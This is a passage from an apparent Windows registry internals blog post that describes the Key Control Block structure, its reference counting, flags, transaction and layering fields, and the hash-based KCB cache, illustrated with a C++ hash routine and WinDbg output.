       +0x041 LayerSemantics   : UChar
       +0x042 LayerHeight      : Int2B
       +0x044 Spare1           : Uint4B
       +0x048 ParentKcb        : Ptr64 _CM_KEY_CONTROL_BLOCK
       +0x050 NameBlock        : Ptr64 _CM_NAME_CONTROL_BLOCK
       +0x058 CachedSecurity   : Ptr64 _CM_KEY_SECURITY_CACHE
       +0x060 ValueList        : _CHILD_LIST
       +0x068 LinkTarget       : Ptr64 _CM_KEY_CONTROL_BLOCK
       +0x070 IndexHint        : Ptr64 _CM_INDEX_HINT_BLOCK
       +0x070 HashKey          : Uint4B
       +0x070 SubKeyCount      : Uint4B
       +0x078 KeyBodyListHead  : _LIST_ENTRY
       +0x078 ClonedListEntry  : _LIST_ENTRY
       +0x088 KeyBodyArray     : [4] Ptr64 _CM_KEY_BODY
       +0x0a8 KcbLastWriteTime : _LARGE_INTEGER
       +0x0b0 KcbMaxNameLen    : Uint2B
       +0x0b2 KcbMaxValueNameLen : Uint2B
       +0x0b4 KcbMaxValueDataLen : Uint4B
       +0x0b8 KcbUserFlags     : Pos 0, 4 Bits
       +0x0b8 KcbVirtControlFlags : Pos 4, 4 Bits
       +0x0b8 KcbDebug         : Pos 8, 8 Bits
       +0x0b8 Flags            : Pos 16, 16 Bits
       +0x0bc Spare3           : Uint4B
       +0x0c0 LayerInfo        : Ptr64 _CM_KCB_LAYER_INFO
       +0x0c8 RealKeyName      : Ptr64 Char
       +0x0d0 KCBUoWListHead   : _LIST_ENTRY
       +0x0e0 DelayQueueEntry  : _LIST_ENTRY
       +0x0e0 Stolen           : Ptr64 UChar
       +0x0f0 TransKCBOwner    : Ptr64 _CM_TRANS
       +0x0f8 KCBLock          : _CM_INTENT_LOCK
       +0x108 KeyLock          : _CM_INTENT_LOCK
       +0x118 TransValueCache  : _CHILD_LIST
       +0x120 TransValueListOwner : Ptr64 _CM_TRANS
       +0x128 FullKCBName      : Ptr64 _UNICODE_STRING
       +0x128 FullKCBNameStale : Pos 0, 1 Bit
       +0x128 Reserved         : Pos 1, 63 Bits
       +0x130 SequenceNumber   : Uint8B


    I will not document each member individually, but will instead cover them in larger groups according to their common themes and functions.

    Reference count

    Key Control Blocks are among the most frequently referenced registry objects, as almost every persistent registry operation involves an associated KCB. These blocks are referenced in various ways: by a subkey's KCB.ParentKcb pointer, a symbolic link key's KCB.LinkTarget pointer, through the global KCB tree, via open key handles (and the corresponding key bodies), in pending transacted operations (e.g., the _CM_KCB_UOW.KeyControlBlock pointer), and so on.

    For system stability and security, it's crucial to accurately track all these active KCB references. This is done using the RefCount field, the first member in the KCB structure (offset 0x0). Historically a 16-bit field, it later became a 32-bit integer, and on modern systems it is a native machine word in size, typically 64 bits. Whenever kernel code needs to operate on a KCB or store a pointer to it, it should increment the RefCount using functions from the CmpReferenceKeyControlBlock family. Conversely, when a KCB reference is no longer needed, functions like CmpDereferenceKeyControlBlock should decrement the count. When RefCount reaches zero, the kernel knows the structure is no longer in use and can safely free it.

    Besides standard reference counting, KCBs employ optimizations to delay certain memory management processes. This avoids excessive KCB allocation and deallocation when a KCB is briefly unreferenced. Two mechanisms are used: delay deref and delay close. The former delays the actual refcount decrement, while the latter postpones object deallocation even after RefCount reaches zero. Callers must use the specialized function CmpDelayDerefKeyControlBlock for the delayed dereference.

    From a low-level security perspective, it's worth considering potential issues related to the reference counting. Integer overflow might seem like a possibility, but it's practically impossible due to the field's width and additional overflow protection present in the CmpReferenceKeyControlBlock-like functions. A more realistic concern is a scenario where the kernel accidentally decrements the refcount by a larger value than the number of released references. This could lead to premature KCB deallocation and a use-after-free condition. Therefore, accurate KCB reference counting is a crucial area to investigate when researching Windows for registry vulnerabilities.
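    The guarded increment/decrement pattern can be sketched as below. This is a minimal illustration of the overflow and underflow concerns discussed above, not the real CmpReferenceKeyControlBlock logic, which is lock-free and considerably more involved; the FAKE_KCB type and function names are my own.

```c
#include <assert.h>
#include <stdint.h>

/* Simplified stand-in for a KCB with only its reference count. */
typedef struct {
    uint64_t RefCount;
} FAKE_KCB;

/* Refuses to wrap the counter on overflow, returning 0 instead. */
static int ReferenceKcb(FAKE_KCB *Kcb) {
    if (Kcb->RefCount == UINT64_MAX)
        return 0;
    Kcb->RefCount++;
    return 1;
}

/* Returns 1 when the count reaches zero and the object may be freed.
 * Decrementing a zero refcount would be the premature-free bug class
 * described above, so it is treated as fatal here. */
static int DereferenceKcb(FAKE_KCB *Kcb) {
    assert(Kcb->RefCount > 0);
    return --Kcb->RefCount == 0;
}
```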

    Basic key information

    As mentioned earlier, one of the most important types of information in the KCB is the unique identifier of the key in the hive, consisting of the _HHIVE descriptor pointer (KeyHive) and the corresponding key cell index (KeyCell). Very frequently, the kernel uses these two members to obtain the address of the key node mapping, which resembles the following pattern in the decompiled code:

    _HHIVE *Hive = Kcb->KeyHive;
    _CM_KEY_NODE *KeyNode = Hive->GetCellRoutine(Hive, Kcb->KeyCell);

    //
    // Further operations on KeyNode...
    //

    Cached data from the key node

    Whenever some information about a key needs to be queried based on its handle, it is generally more efficient to read it from the KCB than the key node. The reason is that a pool-based KCB access requires fewer memory fetches (it avoids the cell map walk), bypasses the context switch to the Registry process, and eliminates the potential need to page in hive data from disk. Consequently, the following types of information are cached inside KCBs:

    • Key name, which is stored in a public _CM_NAME_CONTROL_BLOCK structure and pointed to by the NameBlock member. Every unique key name in the system has its own instance of the _CM_NAME_CONTROL_BLOCK object, which is reference-counted and shared across all KCBs of keys with that name. This is an optimization designed to prevent storing multiple redundant copies of the same string in kernel memory.
    • Flags, stored in the Flags member and being an exact copy of the _CM_KEY_NODE.Flags value. There is also the KcbUserFlags field that caches the value of _CM_KEY_NODE.UserFlags, and KcbVirtControlFlags, which caches the value of _CM_KEY_NODE.VirtControlFlags. The semantics of all of these bitmasks were discussed in Part 5.
    • Security descriptor, stored in a separate _CM_KEY_SECURITY_CACHE structure and pointed to by CachedSecurity.
    • Subkey count, stored in the SubKeyCount field. It expresses the cumulative number of the key's stable and volatile subkeys, i.e. it is equal to the sum of _CM_KEY_NODE.SubKeyCounts[0] and SubKeyCounts[1].
    • Value list, stored in the ValueList structure of type _CHILD_LIST, and equivalent to _CM_KEY_NODE.ValueList.
    • Key limits, represented by KcbMaxNameLen, KcbMaxValueNameLen and KcbMaxValueDataLen. They correspond to the key node fields with the same names without the "Kcb" prefix.
    • Fully qualified path, stored in FullKCBName. It is lazily initialized in the internal CmpConstructAndCacheName function, either when resolving a symbolic link, or as a result of calling the documented CmCallbackGetKeyObjectID API. A previously initialized path may be marked as stale by setting FullKCBNameStale (the least significant bit of the FullKCBName pointer).
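    The stale bit packed into the FullKCBName pointer is a classic tagged-pointer trick: since the _UNICODE_STRING allocation is at least 2-byte aligned, bit 0 of the pointer is always free to carry a flag. A minimal sketch, with hypothetical helper names of my own:

```c
#include <assert.h>
#include <stdint.h>

/* Set bit 0 of the pointer to mark the cached name as stale. */
static void *MarkNameStale(void *Name) {
    return (void *)((uintptr_t)Name | 1);
}

/* Test whether the stale bit is set. */
static int IsNameStale(void *Name) {
    return (int)((uintptr_t)Name & 1);
}

/* Strip the tag bit to recover the real pointer before dereferencing. */
static void *GetNamePointer(void *Name) {
    return (void *)((uintptr_t)Name & ~(uintptr_t)1);
}
```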

    It is essential for system security that the information found in KCBs is always synchronized with their key node counterparts. This is one of the most fundamental assumptions of the Windows registry implementation, and failure to guarantee it typically results in memory corruption or other severe security vulnerabilities.

    Extended flags

    In addition to the flags fields that simply mirror the corresponding values from the key node, like Flags, KcbUserFlags and KcbVirtControlFlags, there is also a set of extended flags that are KCB-specific. They are stored in the following fields:

       +0x008 ExtFlags         : Pos 0, 16 Bits
       +0x008 Freed            : Pos 16, 1 Bit
       +0x008 Discarded        : Pos 17, 1 Bit
       +0x008 HiveUnloaded     : Pos 18, 1 Bit
       +0x008 Decommissioned   : Pos 19, 1 Bit
       +0x008 SpareExtFlag     : Pos 20, 1 Bit
    [...]
       +0x040 DelayedDeref     : Pos 0, 1 Bit
       +0x040 DelayedClose     : Pos 1, 1 Bit
       +0x040 Parking          : Pos 2, 1 Bit


    For the eight explicitly defined flags, here's a brief explanation:

    • Freed: the KCB has been freed, but the underlying pool allocation may still be alive as part of the CmpFreeKCBListHead (older systems) or CmpKcbLookaside (Windows 10 and 11) lookaside lists.
    • Discarded: the KCB has been unlinked from the global KCB tree and is not available for name-based lookups, but there may still be active references to it via open handles. It is typically set for keys that have been deleted, and for old instances of keys that have been renamed.
    • HiveUnloaded: the underlying hive has been unloaded.
    • Decommissioned: the KCB is no longer used (its reference count dropped to zero) and it is ready to be freed, but it hasn't been freed just yet.
    • SpareExtFlag: as the name suggests, this is a spare bit that may be associated with a new flag in the future.
    • DelayedDeref: the key is subject to a "delayed deref" mechanism, due to having been dereferenced using CmpDelayDerefKeyControlBlock instead of CmpDereferenceKeyControlBlock. This serves to defer the actual dereferencing of the KCB by some time, anticipating its near-future need and thus avoiding a redundant free-allocate sequence.
    • DelayedClose: the key is subject to a "delayed close" mechanism, which is similar to delayed deref, but it involves delaying the freeing of a KCB structure even if its refcount has dropped to zero.
    • Parking: the purpose of this bit is unclear, and it seems to be currently unused.

    Last but not least, the ExtFlags member stores a further set of flags, which can be expressed as the following enum:

    enum _CM_KCB_EXT_FLAGS
    {
      CM_KCB_NO_SUBKEY           = 0x1,
      CM_KCB_SUBKEY_ONE          = 0x2,
      CM_KCB_SUBKEY_HINT         = 0x4,
      CM_KCB_SYM_LINK_FOUND      = 0x8,
      CM_KCB_KEY_NON_EXIST       = 0x10,
      CM_KCB_NO_DELAY_CLOSE      = 0x20,
      CM_KCB_INVALID_CACHED_INFO = 0x40,
      CM_KCB_READ_ONLY_KEY       = 0x80,
      CM_KCB_READ_ONLY_SUBKEY    = 0x100,
    };


    Let's break it down:

    • CM_KCB_NO_SUBKEY, CM_KCB_SUBKEY_ONE, CM_KCB_SUBKEY_HINT: these flags are currently obsolete, and were originally related to an old performance optimization. CM_KCB_NO_SUBKEY indicated that the key had no subkeys. CM_KCB_SUBKEY_ONE indicated that the key had exactly one subkey, and its 32-bit hint value was stored in KCB.HashKey. Finally, CM_KCB_SUBKEY_HINT indicated that the hints of all subkeys were stored in a dynamically allocated buffer pointed to by KCB.IndexHint. According to my analysis, none of the flags seem to be used in modern versions of Windows, even though their related fields in the KCB structure still exist.
    • CM_KCB_SYM_LINK_FOUND: indicates that the key is a symbolic link whose target KCB has already been resolved during a previous access, and is cached in KCB.CachedChildList.RealKcb (older systems) or KCB.LinkTarget (Windows 10 and 11). It is an optimization designed to speed up the process of traversing symlinks, by performing the path lookup only once and later referring directly to the cached KCB where possible.
    • CM_KCB_KEY_NON_EXIST: this is another deprecated flag that existed in historical implementations of the registry, but doesn't seem to be used anymore.
    • CM_KCB_NO_DELAY_CLOSE: indicates that the key mustn't be subject to the "delayed close" mechanism, and instead should be freed as soon as all references to it are dropped.
    • CM_KCB_INVALID_CACHED_INFO: this flag simply indicates that the IndexHint/HashKey/SubKeyCount fields contain out-of-date information that shouldn't be relied on.
    • CM_KCB_READ_ONLY_KEY: this key is designated as read-only and, therefore, is not modifiable. The flag can be set by using the undocumented NtLockRegistryKey system call, which can only be called from kernel-mode. Shout out to James Forshaw who wrote an interesting post about it on his blog.
    • CM_KCB_READ_ONLY_SUBKEY: the exact meaning and usage of the flag is unclear, but it appears to be enabled for keys with at least one descendant subkey marked as read-only. Specifically, the internal CmLockKeyForWrite function (the main routine behind NtLockRegistryKey's logic) sets it iteratively for every parent key of the read-only key, up to and including the hive's root.

    Key body list

    To optimize access, the KCB stores the first four key body handles in the KeyBodyArray for fast, lockless access. The KeyBodyListHead field maintains the head of a doubly-linked list for any additional handles.

    KCB lock

    The KcbPushlock member within the KCB structure is a lock used to synchronize access to the key during various registry system calls. This lock is passed to standard kernel pushlock APIs, such as ExAcquirePushLockSharedEx, ExAcquirePushLockExclusiveEx, and ExReleasePushLockEx.

    Transacted state

    The key control block is central to managing the transacted state of registry keys, maintaining pending changes in memory before they are committed to the hive. Several fields within the KCB are specifically dedicated to this function:

    • KCBUoWListHead: This field is a list head that anchors a list of Unit of Work (UoW) structures. Each UoW represents a specific action taken within a transaction, such as creating or deleting a key, or setting or deleting a value. This list allows the system to track all pending transactional operations related to a particular key, and it is crucial for ensuring atomicity, as it records the operations that must be applied or rolled back as a single unit.
    • TransKCBOwner: This field is used to identify the transaction object that "owns" the key. It is set on the KCBs of transactionally created keys, and signifies that the key is currently only visible in the context of the specific transaction. Once the transaction commits, this field is cleared, and the key becomes visible in the global registry tree.
    • KCBLock and KeyLock: Two so-called intent locks of type _CM_INTENT_LOCK, which are used to ensure that no two transactions can be associated with a single key if their respective operations could invalidate each other's state. According to my understanding, KCBLock protects the consistency of the KCB in this regard, and KeyLock protects the key node. The !reg ixlock WinDbg command is designed to display the internal state of these locks.
    • TransValueCache: This field is a structure that caches value entries associated with a particular KCB, if at least one of its values has been modified in an active transaction. Before a value is set, modified or deleted within a transaction for the first time, a copy of the current value list is taken and stored here. When a transaction is committed, the TransValueCache state is applied back to the key's persistent value list. On rollback, the list is simply discarded.
    • TransValueListOwner: This field is a pointer to a transaction that currently "owns" the TransValueCache. At any given time, for each key, there may be at most one active transaction that has any pending operations involving the key's values.

    These fields collectively form the core transaction management within the Windows Registry. Ever since their introduction in Windows Vista, they need to be correctly handled as part of every registry action, be it read or write, transacted or non-transacted. This is because the kernel must potentially incorporate any transacted state into any information queries, must not allow two contradictory transactions to exist at the same time, and must not allow a non-transacted operation to break any assumptions of an active transaction without invalidating it first. Any bugs related to managing the transacted state may have significant security implications, with some interesting examples being CVE-2023-21748 and CVE-2023-23420. The specific structures used to store the transacted state, such as _CM_TRANS or _CM_KCB_UOW, are discussed in more detail in the "Transaction structures" section below.

    Layered key state

    Layered keys were introduced in Windows 10 version 1607 to support containerization through differencing hives. Because overlaying hives on top of each other is primarily a runtime concept, the Key Control Block (KCB) is the natural place to hold the state related to this feature, and there are three main members involved in this process:

    • LayerSemantics: This 2-bit field indicates the state of a key within the layering system. It is an exact copy of the key's _CM_KEY_NODE.LayerSemantics value, cached in the KCB for easier and quicker access. For a detailed overview of its possible values, please refer to Part 5.
    • LayerHeight: This field specifies the level of the key within the differencing hive stack. A higher LayerHeight indicates that the key is higher up in the stack of layered hives, and a value of zero is used for base hives (i.e. normal non-differencing hives loaded on the host system).
    • LayerInfo: This is a pointer to a _CM_KCB_LAYER_INFO structure, which describes the key's position within the stack of differencing hives. Among other things, it contains a pointer to the lower layer on the key stack, and the head of a list of layers above the current one.

    The specifics of the structures associated with this functionality are discussed in the "Layered keys" section below.

    KCB tree structure

    While key bodies are a common way to access KCB structures, they're not the only method. They are integral when you have an open handle to a key, as operations on the handle follow the handle → key body → KCB translation path. However, looking up keys by name or path is also crucial. Whether a key is opened or created, it relies on either an existing handle and a relative path (single subkey name or a longer path with backslash-separated names), or an absolute path starting with "\Registry\". In this scenario, the kernel needs to quickly check if a KCB exists for the given key and to obtain its address if it does. To achieve this, KCBs are organized into their own tree structure, which the kernel can traverse. The tree is rooted in CmpRegistryRootObject (specifically CmpRegistryRootObject->KeyControlBlock, as CmpRegistryRootObject itself is the key body representing the \Registry key), and mirrors the current registry layout from a high-level perspective.

    Diagram illustrating the Windows Registry Key Control Block (KCB) tree structure used for key lookups by name or path. The tree starts with the REGISTRY root, branching into top-level keys like MACHINE and USER. It further details the hierarchy under MACHINE, showing SOFTWARE linked to another SOFTWARE node which contains keys like Classes, Microsoft, and Windows NT, mirroring the registry's layout. Cloud symbols indicate deeper nesting within the structure.

    Let's highlight several key points:

    • KCB Existence: There's no guarantee that a corresponding KCB exists for every registry key. KCBs are allocated lazily only when a key is opened, created, or when a KCB that depends on the one being created is about to be allocated.
    • Consistent KCB Tree Structure: The KCB tree structure is always consistent. If a KCB exists for a key, then KCBs for all its ancestors up to the root \Registry key must also exist.
    • Cached Information in KCBs: KCBs contain cached information from the key node, plus additional runtime information that may not yet be in the hive (e.g., pending transactions). Before performing any operation on a key, it's crucial to consult its KCB.
    • KCB Uniqueness: At any given time, there can be only one KCB corresponding to a specific key attached to the tree. It's possible for multiple KCBs of the same key to exist in memory, but only if some of them correspond to deleted instances, in which case they are no longer visible in the global tree (only through the handles, until they are closed). Before creating a new KCB, the kernel should always ensure that there isn't an existing one, and if there is, use it. Failing to maintain this invariant can lead to severe consequences, as illustrated by CVE-2023-23420.
    • KCB Tree and Hives: The KCB tree combines key descriptors from different hives and therefore must implement support for "exit nodes" and "entry nodes", as described in the previous blog post. Both exit and entry nodes have corresponding KCBs that can be viewed and analyzed in WinDbg. Resolving transitions between exit and entry nodes generally involves reading the (_HHIVE*, root cell index) pair from the exit node and then locating and navigating to the corresponding KCB in the destination hive. To speed up this process, the kernel uses an optimization that sets the CM_KCB_SYM_LINK_FOUND flag (0x8) in the exit node's KCB and stores the entry node's KCB address in KCB.LinkTarget, simulating a resolved symbolic link and avoiding the need to look up the entry's KCB every time the key is traversed. In the diagram above, entry keys are marked in blue, exit nodes in orange, and the special connection between them by the connector with black squares.
    • Key Depth: Every open key in the system has a depth in the global tree, representing the number of nesting levels separating it from the root. This value is stored in the TotalLevels field. For example, the root key \Registry has a depth of 1, and the key \Registry\Machine\Software\Microsoft\Windows has a depth of 5.
    • Parent KCB Pointer: Every initialized KCB structure (whether attached to the tree or not) contains a pointer to its parent KCB in the ParentKcb field. The only exception is the global root \Registry, for which this pointer is NULL.

    Now that we understand how the KCB tree works conceptually, let's examine how it is represented in memory. Interestingly, the KCB structure itself doesn't store a list of its subkeys. Instead, it relies on a simple 32-bit hash of the name string for fast lookups by name. The hash is calculated by multiplying successive characters of the string by powers of 37, where the first character is multiplied by the highest power and the last by the lowest (37⁰, which is 1). This allows for a straightforward iterative implementation, shown below in C++ code:

    uint32_t HashString(const std::string& str) {
      uint32_t hash = 0;
      for (size_t i = 0; i < str.size(); i++) {
        hash = hash * 37 + toupper(str[i]);
      }
      return hash;
    }


    Some example outputs of the algorithm are:

    HashString("Microsoft")      = 0x7f00cd26
    HashString("Windows")        = 0x2f7de68b
    HashString("CurrentVersion") = 0x7e25f69d


    To calculate the hash of a path with multiple components, the same algorithm steps are repeated. However, in this case, the hashes of the successive path parts are treated similarly to the letters in the previous example. Therefore, the following formula is used to calculate the hash of the full "Microsoft\Windows\CurrentVersion" path:

    0x7f00cd26 × 37² + 0x2f7de68b × 37¹ + 0x7e25f69d × 37⁰ = 0x86a158ea (mod 2³²)


    The hash value calculated for each key, based on its path relative to the hive's root, is stored in KCB.ConvKey.Hash. Consequently, the hash value for the standard system key HKLM\Software\Microsoft\Windows\CurrentVersion is 0x86a158ea.
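    The two-level hashing scheme described above can be reproduced offline with a short, self-contained sketch. HashKeyName and HashKeyPath are made-up helper names for illustration, not the kernel's internal routines:

```cpp
#include <cctype>
#include <cstdint>
#include <string>
#include <vector>

// Hash of a single key name: successive characters are uppercased and folded
// into the hash with a multiplier of 37 (wrapping 32-bit arithmetic).
uint32_t HashKeyName(const std::string& name) {
  uint32_t hash = 0;
  for (char c : name) {
    hash = hash * 37 + static_cast<uint32_t>(toupper(static_cast<unsigned char>(c)));
  }
  return hash;
}

// Hash of a multi-component path: per-component hashes are combined with the
// same iterative formula, so each component hash plays the role of a single
// "character" in the outer computation.
uint32_t HashKeyPath(const std::vector<std::string>& components) {
  uint32_t hash = 0;
  for (const std::string& component : components) {
    hash = hash * 37 + HashKeyName(component);
  }
  return hash;
}
```

    For example, HashKeyPath({"Microsoft", "Windows", "CurrentVersion"}) evaluates to 0x86a158ea, matching the ConvKey.Hash value of the HKLM\Software\Microsoft\Windows\CurrentVersion key quoted above.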

    Every hive has a directory of the KCBs within it, structured as a hashmap with a fixed number of buckets. Each bucket comprises a linked list of the KCBs located there. Internally, this directory is referred to as the "KCB cache" and is represented by the following two fields in the _CMHIVE structure:

       +0x670 KcbCacheTable     : Ptr64 _CM_KEY_HASH_TABLE_ENTRY
       +0x678 KcbCacheTableSize : Uint4B


    KcbCacheTable is a pointer to a dynamically allocated array of _CM_KEY_HASH_TABLE_ENTRY structures, and KcbCacheTableSize specifies the number of buckets (i.e., the number of elements in the KcbCacheTable array). In practice, the size of this KCB cache is 128 buckets for the virtual \Registry hive, 512 for the vast majority of hives loaded in the system, and 1024 for two specific system hives: HKLM\Software and HKLM\System. Given a specific key with a name hash denoted as ConvKey, its KCB can be found in the cache bucket indexed as follows:

    TmpHash = 101027 * (ConvKey ^ (ConvKey >> 9));
    CacheIndex = (TmpHash ^ (TmpHash >> 9)) & (Hive->KcbCacheTableSize - 1);
    //
    // Kcb can be found in Hive->KcbCacheTable[CacheIndex]
    //


    The operation of translating a key's path hash to its KCB cache table index (excluding the modulo KcbCacheTableSize step) is called "finalization". There's even a WinDbg helper command that can perform this action for us: !reg finalize. We can test it on the hash we calculated for the "Microsoft\Windows\CurrentVersion" path:

    0: kd> !reg finalize 0x86a158ea
    Finalized Hash for Hash=0x86a158ea: 0xc2c65312


    So, the finalized hash is 0xc2c65312, and since the KCB cache size of the SOFTWARE hive is 1024 buckets, the index of the HKLM\Software\Microsoft\Windows\CurrentVersion key in the array will be the lowest 10 bits of that value, or 0x312. We can verify that our calculations are correct by finding the SOFTWARE hive in memory and listing the keys located in its individual buckets:

    0: kd> !reg hivelist
    ...
    | ffffe10d2dad4000 |    4da2000  | ffffe10d2da78000 |     3a6000    |  ffffe10d3489f000  | ffffe10d2d8ff000  | emRoot\System32\Config\SOFTWARE
    ...
    0: kd> !reg openkeys ffffe10d2dad4000
    ...
    Index 312:          86a158ea kcb=ffffe10d2d576a30 cell=000a58e8 f=00200000 \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION
    ...


    As we can see, our calculations check out. We could achieve a similar result with the !reg hashindex command, which takes the address of the _HHIVE object and the ConvKey of a given key, and then prints out information about the corresponding bucket.
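    The finalization step can likewise be verified outside of WinDbg. Below is a minimal sketch; FinalizeHash and KcbCacheIndex are invented names for illustration, not the kernel's:

```cpp
#include <cstdint>

// "Finalization": scrambles the 32-bit path hash before it is reduced modulo
// the per-hive KCB cache size (wrapping 32-bit arithmetic throughout).
uint32_t FinalizeHash(uint32_t conv_key) {
  uint32_t tmp = 101027u * (conv_key ^ (conv_key >> 9));
  return tmp ^ (tmp >> 9);
}

// Bucket index in Hive->KcbCacheTable; the table size is a power of two
// (e.g. 1024 for the SOFTWARE and SYSTEM hives), so the modulo reduction
// is a simple bitwise AND.
uint32_t KcbCacheIndex(uint32_t conv_key, uint32_t cache_table_size) {
  return FinalizeHash(conv_key) & (cache_table_size - 1);
}
```

    FinalizeHash(0x86a158ea) yields 0xc2c65312, and KcbCacheIndex(0x86a158ea, 1024) yields 0x312, in line with the !reg finalize and !reg openkeys output shown above.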

    Within a single bucket in the KCB cache, all the KCBs are linked together in a singly-linked list starting at the _CM_KEY_HASH_TABLE_ENTRY.Entry pointer. The subsequent elements are accessible through the _CM_KEY_HASH.NextHash field, which points to the KCB.KeyHash structure in the next KCB on the list. A diagram of this data structure is shown below:

    Diagram of the Windows Registry KCB cache structure. A pointer from the _CMHIVE structure references a _CM_KEY_HASH_TABLE_ENTRY array (hash table). Each entry/bucket in this array points to a singly-linked list of Key Control Blocks (KCBs). Within each KCB, the NextHash field points to the KeyHash structure of the subsequent KCB in the list, forming the chain.

    Now that we understand how the KCB objects are internally organized, let's examine how name lookups are implemented. Suppose we want to take a single step through a path and find the KCB of the next subkey based on its parent KCB and the key name. The process is as follows (assuming the parent is not an exit node):

    1. Get the pointer to the hive descriptor on which we are currently operating from ParentKcb->KeyHive.
    2. Calculate the hash of the subkey name based on its full path relative to the hive in which it is located.
    3. Calculate the appropriate index in the KCB cache based on the name hash and iterate through the linked list, comparing:
      • The hash of the key name.
      • The pointer to the parent KCB.
      • If both of the above match, perform a full comparison of the key name. If it matches, we have found the subkey.

    The process is particularly interesting because it is not based on directly iterating through the subkeys of a given key, but instead on iterating through all the keys in the particular cache bucket. Thanks to the use of hashing, the vast majority of checks of potential candidates for the sought-after subkey are reduced to a single comparison of two 32-bit numbers, making the whole process quite efficient. The performance is mostly dependent on the total number of keys in the hive and the number of hash collisions for the specific cache index.
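    To make the mechanism concrete, here is a deliberately simplified user-mode model of a single lookup step. The structure layouts are reduced mock-ups, not the real _CM_KEY_CONTROL_BLOCK or _CM_KEY_HASH definitions, and all names are invented:

```cpp
#include <cctype>
#include <cstdint>
#include <string>
#include <vector>

// Reduced mock-up of a KCB: just the fields the lookup touches.
struct MockKcb {
  uint32_t conv_key;   // hash of the key's path relative to the hive root
  MockKcb* parent;     // ParentKcb analogue
  std::string name;    // key name (last path component)
  MockKcb* next_hash;  // _CM_KEY_HASH.NextHash analogue (bucket chain)
};

// Case-insensitive comparison, since registry key names are not case-sensitive.
static bool NamesEqual(const std::string& a, const std::string& b) {
  if (a.size() != b.size()) return false;
  for (size_t i = 0; i < a.size(); i++) {
    if (toupper((unsigned char)a[i]) != toupper((unsigned char)b[i])) return false;
  }
  return true;
}

// One step of the tree walk: find the KCB of `name` under `parent` by scanning
// the cache bucket selected by the subkey's ConvKey. The cheap 32-bit
// comparisons filter out almost all candidates before the full name check.
MockKcb* FindSubkeyKcb(const std::vector<MockKcb*>& cache_table,
                       MockKcb* parent, uint32_t subkey_conv_key,
                       const std::string& name) {
  uint32_t tmp = 101027u * (subkey_conv_key ^ (subkey_conv_key >> 9));
  uint32_t index = (tmp ^ (tmp >> 9)) & (cache_table.size() - 1);
  for (MockKcb* kcb = cache_table[index]; kcb != nullptr; kcb = kcb->next_hash) {
    if (kcb->conv_key == subkey_conv_key && kcb->parent == parent &&
        NamesEqual(kcb->name, name)) {
      return kcb;
    }
  }
  return nullptr;  // no KCB cached for this subkey
}

// Tiny self-check: one parent and one subkey chained into a 16-bucket table.
bool DemoLookup() {
  MockKcb parent{0x1111, nullptr, "ROOT", nullptr};
  uint32_t child_key = 0x2222;
  MockKcb child{child_key, &parent, "Child", nullptr};
  std::vector<MockKcb*> table(16, nullptr);
  uint32_t tmp = 101027u * (child_key ^ (child_key >> 9));
  table[(tmp ^ (tmp >> 9)) & (table.size() - 1)] = &child;
  // Lookup with different letter case still succeeds.
  return FindSubkeyKcb(table, &parent, child_key, "child") == &child;
}
```

    Note how a candidate is rejected by two pointer-sized/word-sized comparisons in the common case, which is exactly why the kernel's approach of scanning a whole cache bucket, rather than a per-key subkey list, remains efficient.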

    If you'd like to dive deeper into the implementation of KCB tree traversal, I recommend analyzing the internal function CmpFindKcbInHashEntryByName, which performs a single step through the tree as described above. Another useful function to analyze is CmpPerformCompleteKcbCacheLookup, which recursively searches the tree to find the deepest KCB object corresponding to one of the elements of a given path.

    For those experimenting in WinDbg, here are a few useful commands related to KCBs and their trees:

    • !reg findkcb: This command finds the address of the KCB in the global tree that corresponds to the given fully qualified registry path, if it exists.
    • !reg querykey: Similar to the command above, but in addition to providing the KCB address, it also prints the hive descriptor address, the corresponding key node address, and information about subkeys and values of the given key.
    • !reg kcb: This command prints basic information about a key based on its KCB. Its advantage is that it translates flag names into their textual equivalents (e.g., CompressedName, NoDelete, HiveEntry, etc.), but it often doesn't provide the specific information one is looking for. In that case, it might be necessary to use the dt _CM_KEY_CONTROL_BLOCK command to dump the entire structure.

    Other structures

    So far, this blog post has described only a few of the most important registry structures, which are essential to know for anyone conducting research in this area. However, in total, there are over 150 different structures used in the Windows kernel and related to the registry, and only about half are documented through debug symbols or on Microsoft's website. While it's impossible to detail the operation and function of all of these structures in one article, this section aims to at least provide an overview of a majority of them, to note which of them are publicly available, and to briefly describe how they are used internally.

    The layout of many structures corresponding to the most complex mechanisms is publicly unknown at the time of writing and requires significant time and energy to reconstruct. Even then, the correct meaning of each field and flag cannot be guaranteed. Therefore, the information below should be used with caution and verified against the specific Windows version(s) in question before relying on it in any way.

    Key opening/creation

    In PDB | Structure name | Description

    Parse context

    Given that the registry is integrated with the standard Windows object model, all operations on registry paths (both absolute and relative) must be performed through the standard NT Object Manager interface.

    For example, the NtCreateKey syscall calls the CmCreateKey helper function. At this point, there are no further calls to Configuration Manager, but instead, there is a call to ObOpenObjectByNameEx (a more advanced version of ObOpenObjectByName). Several levels down, the kernel will transfer execution back to the registry code, specifically to the CmpParseKey callback, which is the entry point responsible for handling all path operations (i.e., all key open/create actions). This means that the CmCreateKey and CmpParseKey functions, which work together, cannot pass an arbitrary number of input and output arguments to each other. They only have one pointer (ParseContext) at their disposal, which can serve as a communication channel. Thus, the agreement between these functions is that the pointer points to a special "parse context" structure, which has three main roles:

    • Pass the input configuration of a given operation, e.g. information about:
      • operation mode (open/create),
      • transactionality of the operation,
      • following of symbolic links,
      • flags related to WOW64 functionality,
      • optional class data of the created key.
    • Pass some return information, such as whether the key was opened or created.
    • Cache certain information within a single "parse" request, e.g.:
      • information on whether registry virtualization is enabled for a given process,
      • when following a symbolic link, a pointer to the originating hive descriptor, in order to check whether the given transition is allowed within the hive trust class,
      • when following a symbolic link, a pointer to the KCB of its target (or the closest possible ancestor).

    Reconstructing the layout of this structure is a critical step in getting a better understanding of how the key opening/creation process works internally.

    Path info

    When a client references a key by name, one of the first actions taken by the CmpParseKey function (or more specifically, CmpDoParseKey) is to take the string representing that name (absolute or relative), break it into individual parts separated by backslashes, and calculate the 32-bit hashes for each of them. This ensures that parsing only occurs once and doesn't need to be repeated. The structure where the result of this operation is stored is called "path info".

